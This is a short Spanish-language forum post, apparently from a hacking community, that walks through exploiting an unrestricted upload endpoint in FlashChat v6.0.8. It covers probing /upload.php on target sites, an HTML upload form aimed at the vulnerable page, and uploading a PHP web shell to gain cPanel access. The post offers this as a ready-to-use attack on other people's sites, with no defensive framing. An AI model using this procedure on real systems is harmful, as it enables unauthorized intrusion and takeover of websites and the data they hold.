NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.
1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable.
2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo:
<form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html.
3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel.
Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte!
By andygrimm